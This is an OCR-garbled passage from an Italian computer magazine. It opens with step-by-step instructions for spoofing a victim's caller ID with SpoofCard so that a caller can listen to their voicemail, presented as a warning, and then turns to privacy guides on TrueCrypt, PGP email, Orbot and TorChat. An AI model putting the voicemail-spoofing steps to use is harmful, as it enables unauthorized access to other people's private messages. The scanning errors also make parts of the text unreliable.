nali na chiamata. Il servizio offerto da Spoolcard è a pagamento. . ma per il 
pirata questo è solo un dettaglio. 


Investigatore informatico 


Cellulari a rischio intercettazioni 


Seqreterie, 
’jSctìi le spia 

C’è chi riesce ad origliare dal 
proprio telefonino i messaggi 
vocali altrui lasciati in segreteria 













Scelta dei crediti da acquistare 

a Dalla Home il pirata si sposta su SignUp. posto 
nella parte destra del portale, e seleziona il 
pacchetto di credito prelento. Nonostante la 
scelta oonsigl ara sia la sottoscrizione mensileda 24.9b$. 
quest'uttima non viene scelta, poiché il pagamento ina 
tantum non è disponibile per le telefonate in Italia. 



Un moduio da com pilare 

a Dopo aver selezionato i crediti desiderati, il 
malintenzionato dovrà compilare un breve 
modulo con i dati anagrafici e quelli necessa¬ 
ri per effettuare l’acquisto del pacchetto Al fermine, 
per completare l’operazione, cuccherà il bottone Pur- 
Chase Crediti. 



Il ca mello della spesa 

a Terminato il pagamento, al pirata non resta 
che controllare lapropria casella di posta. Qui 
troverà un codice a 9 cifre che gli permetterà 
di accedere al proprio acconti Copia (Ctri+C) il codi¬ 
ce negli appunti del computer, dopo averloselezionato, 
in modo da effettuare il login al servizio di Spoolcard. 


~ C Legacy PIN Login 
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Pronto p er effettu are il Login 

pirata accede nuovamente al portale Spu- 
ofCard.com ed effettua l'accesso tramite il 
bottone Login posto in alto a destra. Inserirà 
I proprio codice a 9 cifre (Ctri+Vj e selezionerà l'im¬ 
magine in base alla richiesta effettuata. Si tratta di un 
sistema di sicurezza atto a garantire l’autenticità 
dell’utente e a bloccare eventuali bot. 
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S II pirata è pronto per configurare la "telefoi# 
ta spia'' Come prima cosa inserirà il prefisso 
intemazionale (+39 per l'Italia) dall’appnsito 
menu a tendina. Successivamente provvederà a impo¬ 
stare, sia per il form Destionation Nrnber che per 
Caller IO lo display, il iiui i ieri) di telefono del malcapi 
tato. Al termine preme sul bottone Place your cali 


Pronti per rascotto 

Configurato il sistema, il pirata provvederà a 
mainare il numero mostrato sul portale Spo¬ 
rcarci dopo aver premuto Place your cali Al 
telefono rsponderà un messaggio; al termine il pirata 
premerà il tasto 3. Una nuova voce chiederà di inserire 
il numero a 4 cifre apparso sullo schermo. Tatto ciò. il 
telefono della “vittima "inizierà a squillare. 
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Fine Nascondi tasti 


Attivazione 
della segreteria 

Sul display del cellula¬ 
re della vittima appari¬ 
rà il suo stesso nume- 
ro di telefono. Se la persona in 
questione risponderà alla chia¬ 
mata, allora la tecnica di “ascol¬ 
to" sara fallita, nel caso in cui 
il destinatario dello scherzo 
abbia il telefono spento o deci¬ 
da di non nspondere, scatterà 
la segreteria telefonica. In que¬ 
sta situazione, però, invece di 
consentire la registrazione di 
un messaggio vocale, consen¬ 
tirà al pirata di ascoltare i mes 
saggi del numero in questione 
registrati. 




COME FANNO I PIRATI A 


SPULCIARE" TRA LE SEGRETERIE 


Abbiamo visto come e facile <p>are i contenuti 
delle segreterie altrui mettendo fn pratica 
la tecnica dell'io spoofing telefonico. Ma i 
sistemi di protezione come mai non funzio¬ 
nano? Purtroppo l’attivazione delia segreteria 
telefonica avviene attraverso l'identificazione 
del chiamante, in particolare attraverso il suo 
ID telefonico. Quindi, sequalcuno rluscissea 
utilizzare lo stesso numero di telefono della 
persona a cui sta telefonando, avrebbe vita 
facile a 'bucare’ il sistema informatico del 
gestore telefonico accedendo liberamente ■ 
a tutti i messaggi vocali. A questo punto ci 
auguriamo che i vari ooeratori telefonici de¬ 
cidano di correre subito ai ripari per tutelare Ig 
al meglio la nostra privacy 
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Pai da te | Il computer invisibile 



Cosa ci l 
occorre 

CLIENT ACCESSO CEDUO 

DROPBOX 

lOlTOY Si; VCD 

Sita Internet: 

www.dropbox.cotn 

SORWWt DI 

TRUECRYPT 

Lo Uovi SU ✓co 


SOFTWARE COMPLETO 


'Jk: Internet: 

; wvw».tnjeufypLorg 

Vk Af+tiVAm • 

COMODO 

ICEDRAGON 

Lo trovi si ✓CIT CdF 
Sito 

www.cornodo.com 

i CUENT CHAT 

TORCHAT 

ivi «i ✓CD 

& M4*;.:.iW 

Sito Internet 

http/;c(xlft[jnogte 

eom/p/torchat 

; CUENT PGP 

MYMAIL-CRYPT 
FOR GMAIL 


SOFTWARE COMPLETO 


Sito Internet: 

httpsz/chrome. gcogte. 
ccm/webstore 


S iamo sicuri che i nostri dati personali 
on-line non vengano in qualche modo 
monitorati canalizzati da qualcun altro 
senza la nostra autorizzazione? Proprio di re¬ 
cente il problema è tornato alla ribalta quando 
tutti i media si sono occupati di Datagate, lo 
scandalo scoppiato in USA che ha visto la NSA, 
l'agenzia di sicurezza statunitense, accusata di 
aver controllato milioni di tabulati telefonici 
dell’operatore Verizon e i dati (e-mail, chat, 
file uploadati ecc.) degli utenti memorizzati 
sui server dei giganti del Web, come Google, 
Microsoft e Facebook, ma anche le comuni¬ 
cazioni riservate di banche centrali europee 
e ambasciate straniere. Nonoijrante il motore 
di ricerca, il gigante del software e il social 
network più famosi della Rete si siano subito 

g lali a smentire ogni coinvolgimento 
attività dell'Agenzia per la Sicurezza 
reale americana, ribadendo invece il 
loro impegno costante a tutelare la sicurezza 
e la privacy dei dall salvati sui propri server, 

[ impressionegenerale degli utenti èche non 
sembra essere poi così remota la possibilità 
di essere spiati in Rete da specifici software 
(vedi PRISM, il programma utilizzato proprio 
per il Datagate) utilizzaii dalle i meli igeaci' d i 
tutto il mondo. 

Un “vizio” intemazionale 

Il caso "Datagate” è, infatti, l’ultimo di una 
lunga serie. Tralasciando i sistemi di monito- 
raggio messi in atto da Paesi non democratici 
(il più famoso è stato sicuramente il famigerato 
firewall cinese di qualche anno fa, ma anche 
ai giorni nostri le tante rivoluzioni arabe so 
no state in parte ostacolate dai blocchi più o 
meno totali delle comunicazioni via Internet), 
possiamo dare uno sguardo in casa nostra per 
rendercicontodicomesiamotutti, in un modo 
o nell’altro, spiati. Lo scandalo americano ha 
dimostrato ancora una volta, se ce ne fosse 
bisogno, che “a pensar male degli altri si fa 
peccato, ma spesso ci si indovina ", come disse 
un famoso politico italiano! U dato più preoc¬ 
cupante è che sono proprio gli Stati nazionali. 


Grande Fratello ti osserva? Ecco 
come renderti invisibile a spie 
governative e malintenzionati! 
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Storage on-line automatizzato! 

Utilizzando il dient di Dropbox possiamo registrarci al servizio cloud, ottenere 2 GB di spazio remoto gratuito 
per i nostri dati e tenerli perfettamente sincronizzati con quelli memorizzati sul PC. Ecco come. 



3 Avviamo l'installazione 

Estraiamo in una cartella del disco rigido il 
contenuto dell'archivio compresso Drop- 
box, zip presente nella sezione AntrvirusSSicvvzza 
del Win CD e facciamo doppio clic sul tifo Dropbox 
2.0.26 exe Nella schermata che compare cliccnia- 
mo sul pulsante Installa. 



a 2 GB di Stor age gratuito ! 

O | Se non abbiamo già un account Dropbox, 
w lasciamo selezionata l’opzione Non Ito un 
account Dropbox e cucchiamo su Successivo 
►Compiliamo i vari campi, accettiamo i terni ini di 
premiamo Successivo. Scegliamo quindi 
il prollcfgratuito (2 GB) e cicchiamo su Successivo 



* Opzioni avanzate dei setup 

3 : Nel la schermata successiva selezioniamo 
-J l'opzione Avanzato e cicchiamo su Suc¬ 
cessivo. Lasciando selezionata la prima opzione, 
il Client di Dropoox verrà salvato nella cartella Cri 
Users\NomeUtente\Dropbox Proseguiamo con un 
clic sul pulsante Successivo 



^ Cartelle da sincronizzare 

^ Selezioniamo Desidero utilizzare la selezio- 
' ne selettiva per scegliere quali cartelle sin¬ 
cronizzare a questo computer e premiamo Sincro¬ 
nizzazione selettiva per verificare le cartelle il cui 
contenuto verrà salvato su Dropbox Chiudiamo la 
finestra con Annulla e premiamo Installa. 


installa zione c ompletata! 

5 : Completiamo l'installazione del Client di 
> J Dropbox premendo npetutamente il pulsante 
Successa nelle successive schermale e al termi¬ 
ne facciamo die su Termina, in Passo nella System 
tray accanto all'orologio, comparirà l'icona di Drop 
box per gestire lo Storage on dino. 


^ La cartella di Dro pbox 

Et In C:\Users\NomeUtentev&jà inoltre creata 
r la cartella Drcpbox con alcuni file di esem 
po e una guida rapida all'uso del servizio. I file che 
copieremo o sposteremo in questa cartella saranno 
automaticamente caricati sul nostro spazio ondine 
di Dropbox. 


gli enti governativi e le grandi multinazionali 
i soggetti più attivi in questo "effervescente* 
mercato dei software spia. Un mercato legale 
e invisibile alla stragrande maggioranza degli 
utenti, a cui attingono grandi software house 
che acquistano letteralmente virus, worm, 
trojan ed exploit utili per testare la sicurezza 
dei loro prodotti. Ma anche i governi sono 
clienti molto importanti. Come non ricorda 
re, ad esempio, il caso Stuxnet (ne abbiamo 
parlato su IVin Magatine 150 a pagina 74), 
il worm che nel 2010 attaccò in maniera mi¬ 


rata le fabbriche nucleari iraniane. Secondo 
molti osservatori, dietro un’arma virtuale 
così potente e devastante c’erano nienteme¬ 
no che gli Stati Uniti e Israele: nessuno lo ha 
mai scoperto o confermato, ovviamente, e 
per saperne di più bisognerà forse attendere 
lo scoppio di un’altra "bomba diplomatica” 
come è stato il discusso progetto WikìLcaks. 

Spie di casa nostra 

bisogna dire, comunque, che i governi occi¬ 
dentali utilizzano i sistemi di intercettazione 


esclusivamente per scopi legittimi di lotta 
alla criminalità e al terrorismo. Proprio l'Ita¬ 
lia è uno dei Paesi più attivi sul fronte delle 
intercettazioni. Era il 2011 quando il trojan 
Querela, finanziato dal nostro Ministero degli 
Interni, permise all'allora pubblico ministero 
Luigi de Magistris di incastrare il faccendiere 
Luigi Bisignani spiando nel suo computer 
(ne abbiamo parlato su Wiin Magatine 156, 
pagina 104). È dei giorni nostri, invece, la 
pubblicazione sulla Gazzetta Ufficiale del 19 
marzo 2013 numero GB del decreto "Direttiva ► 
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O Investigatore informatico 


| Faldate | Il computer invisibile | 



Una cassaforte “cloud” per i dati 


Grazie al tool TrueCrypt possiamo creare un’unità virtuale criptata per proteggere al massimo l’accesso a file 
e cartelle memorizzate nel nostro spazio Dropbox. Ecco la procedura da seguire. 



^ Prima di tutto il setup 


a Estraiamo tutti i file 




■J r \ Scompariamo sull’hard disk il contenu- 
to dall'archivio TrueCrypt.zip (sezione 
Antivirus&Sicurezza del CD-Born) e laccarne dop¬ 
pio clic sul file TrueCrypt Setup la.exe Della scher¬ 
mata de) setup spuntiamo la voce I accertine licerne 
ternrs e premiamo Next 


Vilume I rp« 


2 ! Selezioniamo Extract per installare la verso- 

_ne portabile e premiamo Next. Conlermiamo 

i messaggi di awiso cuccando O/Ce Si. Cucchiamo su 
Crome per selezionare una cartella in cui estrarre I 
file del ijrogramma (ad esempio C:\TrueCrypti e pre 
miamo OK Al termine premiamo OK quindi Finisti. 


^ Creiamo il file del volume 

4 Nella schermata successiva selezioniamo 
Siandard TrueCrypt volume e cucchiamo 
su Next In Volume Location premiamo Select File. 
andiamo nella cartella di Dropbox e indichiamo il nome 
da assegnare ai 'unità captata (nel nostro caso Perso¬ 
nale premiamo Salva e cicchiamo su Next. 


-k La scelta della dimensione 

5 | Da fncryptonAigorif/)/n selezioniamo l’algo- 
—. ritmo di crittografia (ad esempio AES- Twofistri 
per copiare i dati dell'unità virtuale e premiamo Next. 
Digitiamo la dimensione dell’unità virtuale tenendo 
conto che lo Storage di base disponibile su Dropdox è 
pari a 2 GB e premiamo Next 




^ E adesso formattiamo! 

7 ‘! Selezioniamo infine il filesystem con cui for- 
mattare l’unità virtuale, ad esempio NTFSe 
muoviamo il puntatore In modo casuale all'Interno del¬ 
la finestra per aumentare la forza delle chiavi di critto 
grafia. Cicchiamo su Format attendiamo che venga 
creato il file e al termine premiamo Exit. 


^ Un nuovo disco sul PC 

g 1 Dall interfaccia principaJe di TrueCrypt sele- 
--=■# zioniamo dall’elenco dei drive l'unità Z:, 
premiamo Select File , indichiamo il volume appe 
na creato e premiamo Apri Cicchiamo quindi su 
Mount. Digitiamo la password del volume e pre¬ 
miamo OK 



Un’unità “inaccessibile” 

3 I Verrà aperta automaticamente la cartella con 

. J i file di TrueCrypt. Facciamo doppio clic sul file 

TrueCryplexe e nella schermata principale del prò 
gramma cucchiamo su Create Volume. Assicuriamoci 
che sia selezionata l’opzione Create an encrypted file 
container e premiamo Next. 



■ »* 1 •** largii 


— 

Voltine Pnavriint 


^ Una pass word sicura 

g : Digitiamo quindi negli appositi box una pas- 
J sword di accesso le la relativa conferma) 
all unita virtuale. Scegliamola con cura in modo che 
sia sufficientemente complessa e assicuriamoci che la 
sua lunghezza sia di almeno 20 caratteri Proseguiamo 
ciccando sul pulsante Next. 



a È tutt o sincronizzato! 

Q 1 la nuova unità (Zf sarà accessibile da Esplora 
risorse Possiamo già salvarvi dentro dei file. 
Per smontare l'unità virtuale selezioniamola in TrueC¬ 
rypt e premiamo Demount. Una volta smontato il file, 
verrà aggiornato in remoto su Dropbox ma l'archivio 
sarà assolutamente inaccessibile! 
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recante indirizzi perla protezione cibernetica 
e la sicurezza informatica nazionale" fi rina¬ 
to lo scorso 24 gennaio dal Presidente del 
Consiglio dei Ministri Mario Monti (il testo 
completo lo trovi su Win Extra). Tra le altre 
cose, all’articolo 11, comma c, si legge: "Gli 
operatori privati che forniscono reti pubbliche 
di cornunicazioneo servizi di comunicazione 
elettronica accessibili al pubblico, quelli che 
gestiscono infrastrutture critiche di rilievo 
nazionale ed europeo, il cui funzionamen 
to è condizionato dall'operatività di sistemi 
informatici e telematici [...] forniscono infor¬ 
mazioni agli organismi di informazione per la 
sicurezza e consentono ad essi l'accesso alle 
banche dati d’interesse ai fini della sicurezza 
cibernetica di rispettiva pertinenza". Il tutto, 
a quanto pare, senza neanche il controllo 
dell'Autorità garante per la protezione dei 
dati personali. 

Una “nuvola” sicura 

Non serve comunque creare inutili allarmi¬ 
smi, né tantomeno iniziare una caccia alle 
streghe che vedè i nquisiti i moderni e tiri tìtjtjTà 
m i mezzi di comunicazione. l.o abbiamo detto 
tante volte e lo ribadiamo ancora: Internet è un 
incredibile strumento di crescita e sviluppo 
economico per tutti. Chiudere il Web, come 
suggeriscono alcuni finti paladini delle libertà 
personali, o cancellare la propria identità 
on-line non serve a nulla. Occorre, invece, 
un utilizzo più attento e cosciente delle tec¬ 
nologie. È assolutamente lecito, ad esempio, 
domandarsi quanto sono protetti da occhi 
indiscreti i file che ogni giorno carichiamo 
sullo spazio cloud offerto dai servizi Web. Nel 
dubbio la migliore cosa da fare è sicuramente 
quella di prendere le proprie contromisure e 
tutelarsi da ogni possibile accesso non au 


torizzato da parte di estranei ai propri dati 
salvati on-line (foto, documenti, video ecc.). 

Ti facciamo vedere come creare un account 
Dropbox, utilizzare mediante il client del 
servizio lo Storage gratuito di 2 GB per creare 
un backup sincronizzato e automatizzato dei 
dati memorizzatiin una cartelladel computer 
e proteggere il tutto curi TrueGry pt, u ri potente 
tool di crittografia. Basteranno pochi clic per 
rendere i nostri file su Storage cloud (e su PC) 
inaccessibili agli spioni! 

Il computer invisibile 

Al nostro account Dropbox, però, dobbiamo 
arrivarci in maniera altrettanto sicura, evi¬ 
tando server spia che, invece di instradarci 
correttamente sul Web, hanno il solo scopo 
di memorizzare le nostre abitudini in Rete o 
eseguire script in grado di scaricare malware 
di ogni genere sul PC liceo quindila necessità 
di usare unbrowser come Comodo leeDragon: 
si tratta di una versione modificata di Fire 
fox (nella sezione Antìvirus&Sicurezza del 
CD-Rom è presente anche Comodo Dragon , 
la versione del brovvser basato su Chiome) 
ciré, qltre ad un efficace antivirus integrato, 
possiede ijoti ah ri strumentiutili per aiutarci 
a navigare soiosq server davvero sicuri. Im¬ 
pareremo inoltre a chuttaie con gli amici su 
canali protetti e a invia re r ricevere e-ma i 1 a 
prò 1 va d i i r Uerccl t u z i un é&nch e dap a «p d e 11 a 
NSA americana: il trucco wattelTutlliz&tre 
le chiavi di cifratura PGP con cuoi Sta a 2(14# 
bit rea I mente inatt accabili. lnsomma, con un 
minimo di accortezza e con le dritte giuste* 
che troviamo in queste pagine, il Web non 
sembrerà più quel ricettacolo di pericoli e 
malintenzionati che in molti raccontano e le 
nostre navigazioni avverranno al riparo da 
ogni pericolo! 


Duck DuckGo Il MOTORE DI RICERCA ANONIMO 


La rete Internet è ormai così vasta che, per poterla 
visitare, servono necessariamente i motori di 
cerca. Grazie alla loro costante indicizzazio¬ 
ne di miliardi di paqine Web ci permettono di 
raggiungere un sito in pochi clic. Il problema 
? che per fornire risultati sempre più precisi e 
coerenti con le nostre richieste, quasi tutti i se- 
srch engine memorizzano dati relativi all’indi- 
~ zzo IP assegnato al computer che usiamo per 
- 2 . rgare, alla sua dislocazione geografica, alle 
parole chiave utilizzate per le ricerche e così via. 
-I apparenza sembra tutto normale, se non fosse 
me in questo modo, ogni volta che eseguiamo 
-iterca, viene automaticamente creato un 
m-stro profilo utente che in seguito servirà ol- 
t? che a proporci risultati sempre più precisi, 
H-che a confezionare tutte quelle campagne 


promozionali mirate che compaiono sulle paqine 
dei siti Web visitati, quasi come se chi gestisce i 
server remoti sapesse in anticipo i nostri gusti e 
le nostre tendenze, lnsomma, anche le ricerche 
on-line e i nostri profili di internauti assumono 
un alto valore economico, diventando merce di 
scambio preziosa per chiunque sia interessato 
ad entrarne in possesso. La soluzione a questo 
problema è l'utilizzo di DuckDuckGo (https:// 
duckduckgo.com), un motore di ricerca che non 
archivia alcun dato personale sugli utenti e che 
permette quindi di navigare liberamente su Inter 
net senza essere tracciati. Per funzionare, utilizza 
un sistema di cowdsourcing che permette di 
raccogliere informazioni provenienti da altri siti 
con lo scopo di aumentare e migliorare i risultati 
delle ricerche eseguite dagli utenti. 


TRACCIAMENTO IN ATTO 

Bastano pochi clic sul Web per consentire ai 
motori di ricerca di ricreare il nostro profilo 



KI«*7.00(MmH 

■ Direct Trame 1 

4U9C0GB4C^> 

■ Se«rcli Frgtnrr. 

3 00(200%) 

Ot**f 

902124 ?*) i 


M di Googte Shocuroi 


Quando effettuiamo 
una ricerca su 


. e dicchiamo su 
un link tra quelli 


proposti. 


...Il termine di 
ricerca viene di solito 
inviato a tale sito... . 


... insieme ad info 
sul browser e siri PC 


usato. 


... che possono 
identificarci in modo 


univoco 


Sui siti, di solito, sono 
presenti banner 
di tene parti... 


... e gli annunci 
pubblicitari d 
seguono ovunque! 


f 

Age: 34 

L ... quelle terze partii 
B costruiscono un j 

1 nostro profilo... 

% Sex: F 
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9 Massima protezione sul Web 


Usando Comodo IceDragon possiamo verificare la presenza di malware nelle pagine Web. Inoltre, grazie ad uno script 
per Greasemonkey, disponiamo di una tastiera virtuale che vanifica l'azione di keylogger e spyware. 



Installiamo i l browser 

■J j Scompattiamo archivio lceDragon.zip 
* . ; (sezione Antivirus&Sicurezza de CD-Hom 
ed eseguiamo il file tc.edragonsetup.exe. Cicchiamo 
su I Agree e poi su Next Scegliamo gli elementi da 
importare dal browser di delault, ad esempio fenolo¬ 
gia (HistorY, e preferiti Favoritesi 



Iletali •éé on» onky you truat 

IMlHHWirtmil »MM» fMWMTf 

<m jhaaa utadlu f»W Jcf /tuwiw «r 
, . ranm<cuf»u^ai m Mt** m »**r. 


^ DNS sicuri per il Web 

2 Per impostare IceDragon come browser di 
delault lasciamo selezionato Makc Como¬ 
do Browser my default browser e premiamo Next 
Lasciamo intanate le opzioni in IceDragon - Como¬ 
do SecureDNS e premiamo Instali poi Next quindi 
Finish IceDragon si aprirà automaticamente. 


^ Un’interfaccia in italian o! 

A questo punto il browser scaricherà automa¬ 
ticamente il pacchetto die consente di tradur¬ 
re l'interfaccia utente in lingua italiana. Una volta termi¬ 
nato il download, tacciamo clic su Instali Now. quindi 
premiamo Restart nowpet riawiare il browser e ren¬ 
dere effettive le modifiche 


* All a lama dai malware 

5 Un'operazione fondamentale che possiamo 
— compiere con IceDragon è quella di eseguire 
una scansione di una pagina Web per verificare la pre¬ 
senza di eventuali malware prima di aprirla Per farlo 
Pasta citare con il tasto destro su un link e poi sulla 
voce Scan link with Web Inspector. 



a Alcune veloci imp ostazioni 

0 j Cucchiamo sul pulsante IceDragon in alto a 

_ J sinistra, quindi su Options. Andiamo nella 

scheda General digitiamo in Home Page ! a pagina 
Web da aprire all'avvio det browser (ad esempio www. 
google.it). dal menu a tendina Select browser langua- 
ge selezioniamo telane premiamo infine OK. 




decori ?or http /Vvm/w trave! comi' inde* page 



E 

-> 

» ratte., i» 

.1 

&L_ 

. .e.. 


lesto sito Web è sicuro! 

g I II browser eseguirà on-line una scansione 
completa della pagina Web e visualizzerà al 
termine un report dettagliato. In alternativa, se ci tro¬ 
viamo già su una pagina Web possiamo effettuarne 
una scansione cliccando sul pulsante in alto Make a 
page scan witt) Comodo Web Inspector. 



^ Condividere link sui social 

7 tossiamo usare IceDragon anche per condì - 
videre una pagina Web su un social network; 
cicchiamo con il tasto destro sul tasto in alto con l’ico¬ 
na di Facebook e selezioniamo dal menu Facebook, 
Twitter o Linkedln. Inseriamo quindi le nostn creden¬ 
ziali di accesso al social network. 


± E stension e indis pensabile 

Q Colleghiamoci ora al sito www wmmagazine 1' 

. ZJ link/2193 e clicchiamo sul pulsante Aggiungi 
a Firefox. Sbancato il Greasemcnkey, compare la fine¬ 
stra di installazione, cicchiamo sul tasto Installa ades 
so per installare il plug-in e premiamo Riama adesso 
per riavviare il browser 


^ Ecco la tastiera virtuale 

0 Apnamo il sito wrw.winmagazine.it/link/21 94 
■ :e cicchiamo Instali per installare la tastiera 
virtuale Nella nuova finestra premiamo Installa. Per 
aprirla basta un doppio clic su un campo di una pagi¬ 
na Web. Per impostare il layout italiano dal menu della 
tastiera scegliamo Italiano. 
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La mia posta è riservata! 

Grazie ad un’estensione per Chrome possiamo inviare e-mail con la cifratura PGP: in 
questo modo, solo chi conosce la nostra chiave pubblica potrà decifrare il messaggio. 



mymail-crypt for Gmail options 


rny paivai* 


ln«*ft pinata fc*y 
grecate a 


Installiamo Mymail-Cryp t 

■J | Visitiamo l’URL https:/,'chrome.google.com/webstore 
e nel campo di ricerca sulla sinistra digitiamo il nome 
dell'estensione Mymail-Crypt. Attendai* insultati della ricerca e 
cicchiamo sul pulsante Aggiungi H scontrano altercar vomente 
alle successive domande proposte dal 


Generiamo le nostre chiavi 

Dal Menu di Chrome selezioniamo Stwmentl'Estensio- 
ni Molla lista individuiamo Mymatt-ùypte cucchiamo su 
Opzioni Nella schermata successiva cicchiamo poi sul link in alto 
my keys e quindi su generale a new key. Inseriamo i dati richiesti 
e infine cicchiamo sul pulsante submit. 



^ La chiave pubblica per gli amici 

0 | Cicchiamo mykeys/showkey Questa e la nostra chiave 
—pnvata che non dovremo diffondere per nessun motivo 
Ardiamo su friends keys Per ora è presente solo la nostra chiave 
pubblica, che dovremo rendere disponibile a tutti coloro con cui 
vorremo scambiare messaggi criptati. 


a Condivisione in corso 

; Per diffondere la chiave pubblica useremo Dropbox Dal 
••«=*? menu di Mymail-crypt visualizziamo la chiave (vedi passo 
precedente) e copiamone il contenuto in un file di testo da sal¬ 
vare su Dropbox. Selezioniamo II file col mouse e creiamo il Imk 
condiviso da inviare ai nostri contatti. 


mymail-crypt for Gmail options 


my flkendV publte bey* 

•-» •tu*'-. 

inserì (Mitrile keyr 


KiwvMMUn terri >*■ 


— f 


a* s fc 



Le chiavi dei nostri amici 

5 \ Per leggere i messaggi cnptati dei nostri amici abbiamo 
r^J bisogno della loro chiave pubDIica. Contattiamo un amico 
e, dopo avergli fatto installare Mymail-crypt, facciamoci inviare la 
sua chiave. Da friend's keys cucchiamo insert public.. e incoi 
liamo il contenuto della sua chiave pubblica. 


^ Facciamo gualche prova 

0 I Scambiate le reciproche chiavi, testiamo il funzionamento 
di PGP. Componiamo on'e-mail: dopo aver scritto il testo, 
inseriamo la nostra password sul campo In basso, clicchiarno £hc- 
rypt c inviamo il messaggio. Alla ricezione, ii nostro amico dovrà 
cliccare Enctypt per visualizzarlo. 



AL SICURO 
SU FACEBOOK 

Purtroppo, non tutte le 
nostre comunicazioni 
in Rete possono essere 
criptate. Il caso Datava¬ 
te ha dimostrato die le 
nostre bacheche su Fa- 
cebook sono facilmente 
accessibili dalle autorità 
Impegnate in Indagini 
e attività giudiziarie. 
Possiamo però nascon¬ 
dere almeno a spioni di 
ogni genere la nostra 
password e i post che 
pubblichiamo sul Diario. 
Per farlo, è sufficiente 
ricordarsi di aggiungere 
il suffisso https all in¬ 
dirizzo www.facefcook. 
com. In questo modo 
useremo il protocollo 
sicuro di comunicazione 
ed eviteremo che qual¬ 
che malintenzionato, 
sniffando la nostra 
connessione a Internet, 
possa intercettare le 
password e i dati perso¬ 
nali scambiati col social 
network. 



SKYPE NON È 
PIU SICURO 

Dopo anni di onorato 
servizio, è caduto uno 
dei baluardi delle 
comunicazioni sicure. 
Anche le chat su Skype, 
infatti possono adesso 
essere intercettate. Il 
perché è presto detto: 
dopo l'acquisizione da 
parte di Microsoft, il 
programma non utilizza 
più una rete P2P e quindi 
anonima per lo scambio 
di messaggi tra gli 
utenti, ma una struttura 
a server centralizzati, 
gestita direttamente da 
Microsoft. Da Redmond 
garantiscono sulla totale 
sicurezzadellecomu- 
nicazionivia Skype, ma 
ancora una volta il caso 
Datagate insegna che in 
certi casi fidarsi è bene, 
ma non fidarsi e meglio! 
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Fai da te | Il computer invisibile | 


V Investigatore informatici 


v Anonimi anche sul cellulare! 


Anche quando ci colleqhiamo a Internet dal nostro smartphone qualcuno potrebbe spiarci! Ma con l’app giusta 
possiamo difendere efficacemente la nostra privacy. Ecco come configurarla al meglio. 



Applicazioni 

Orbot: Tor on Android 

THE TOR PROJECT FT^rica 



Request Superuser Access 


If you do not want to do this, 
please make sure to use apps 
made to work with Orbot 

1 understand and would like to 
continue without Superuser 


Back 


(Check this box ìf you bave no idea 
what we are lalfcingabout) 

fe*- Select Individuai Apps for Tor 

| None 



J 




Andiamo sul Plav Store 

Colleglliamoci a Internet dallo smartphone, 
accediamo ai Play Stare di Googlej cerchia¬ 
mo l’app gratuita Orbot Tappiamo sul pupille Sca- 
nca e confermiamo culi Accetta e ' J 

modo potremo effettuare direttamente il 
l'installazione dell'app. 


^ Permessi ne c essari 

2 . Al termine, avviamo l'app per iniziare la confi- 
. - ; gurazione guidata di Orbot Tappiamo Next e 
selezioniamo Request Superuser Access [;er abilita 
permessi di amministrazione. Confermiamo quindi 
qualche secondo. Al termi¬ 
ne, pruseuiJiHiiiu con Next 


^ Per tutti o solo per alcuni 

3 ; Possiamo quindi decidere se attivare la navi- 
-:• gazione sicura su tutte le app installate sul 
telefonino o 90io su alcune. In questo caso, selezio¬ 
niamo Select Individuai Apps for Tore proseguiamo 
con Next Attendiamo ora che venga caricato l'elenco 
con tutte le app presenti 


Ul fl https://check.torproj., 


è 


5 


ngratulations. Your browser Is contlgured to 
use Tqr. 



’S'Vrfo wt *<io ti *«.z .ur.g*<i ukr» ‘u,«rcnmreeut» 
tu MmW r , 


<Hf np.Tak l02riM.T4 


- - - 


a. Quali app scegliere? 

4 Apparso l elenco completo delle app installa 
te, selezioniamo quelle di nostro interesse iad 
esempio Browser età Email Per attivare la navigazione 
sicura su tutte le app tappiamo Tor EverYtfiing<. Tap¬ 
parne Close per tornare nella schermala del Passo 3. 
Terminiamo con Next 


Orbot è attivato 

g I A questo punto appare interfaccia principale 
f di Orbot con un grosso pulsante di accensione 
al centro. Teniamolo tappalo fino a quando non appare 
un messaggio di conferma. Dopo pochi secondi, tutto 
è pronto per iniziare a navigare in maniera totalmen¬ 
te anonima. 


* La privacy è ga rantita 

g f Premiamo il pulsante Menu del telefonino e 
-• selezioniamo I opzione Check Si apre quindi 
una finestra dei browser: se appare il messaggio Con- 
gratulatìons Your browser is configured to use Tor. 
tutto è andato per il verso giusto e possiamo iniziare 
subito a navigare! 


CHAT ANONIME: CON TORCHATTI METTI AL SICURO 


Anche le sessioni di chal possono essere 
intercettate, a meno di non usare un dienl 
che si interfaccia alla rete Tor e garantisce 
la non tracciabilità delle conversazioni. 
Si tratta di Torchat, un programma che 
non Iva bisogno di essere installato sul 
PC e può quindi essere utilizzato anche 
da chiavetta USB. Estraiamo il contenu¬ 
to del archivio Torchat.zip dalla sezione 
Antivirus&Skurezza del CDRom ed ese 
guiamo il file torchat.exe nella cartella 


bin Verrà creato un ID causale formato 
da 16 numeri e lettere questo è il nostro 
ID univoco e temporaneo. Visto che è fa 
die dimenticarlo, selezioniamo il nostro 
contatto col tasto destro, clicchlamo Copy 
IDto clipboard e incolliamolo lCfr/+V) 
in un file di testo da conservare al sicu¬ 
ro. Per aggiungere un amico ai contatti, 
dobbiamo necessariamente conoscere 
il suo nick univoco. Clicchiamo col tasto 
destro sull interfaccia del programma e 


selezioniamo Add contact. Facciamoci 
inviare l'ID tramite e-mail (magari usando 
il protocollo crittografico PGP. ..), incollia¬ 
molo nell'apposito campo e diamo OK II 
dient non ha bisogno di alcuna configu 
razione, ma se il nostro provider dovesse 
bloccare determinate porte, basta indicare 
quelle giuste diccando col tasto destro e 
selezionando Settings. Da User interface 
possiamo inoltre specificare la lingua da 
utilizzate per ( interfaccia. 
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Tieniti aggiornato 
con la rivista 
di informatica 
e tecnologia 
più venduta 
in Italia. 


mese comodamente a casa tua! 
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| Software | Recuva j 



Alla ricerca 
perduto 

Hai cancellato per errore Immagini 
e dati da hard disk o memory card? 
Con il tool giusto recuperi tutto! 


ci 


Cosa 
occorre 

SOFTWARE 01 
Kf CU* fili iiAfl 

RECUVA 

»^co 


SOFTWARE COMPLETO 


Sita InlfiTlf:! 

iwww.pirifonn.com 
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A cuite basta un attimo di distrazione per 
compiere un'operazione sbagliata che 
causala cancellazione di file importanti 
da una cartella, da una pcndrivc o da una mc- 
rnory card, magari proprio mentre si cerca di 
fare pulizia. Sulla fotocamera, ad esempio, è 
sufficiente premere per errore un tasto sbagliato 
e tutte le immagini archiviate nella scheda di 
memoria vengono cancellate. Il tempismo, in 
questi casi, è fondamentale! Intervenendo su 
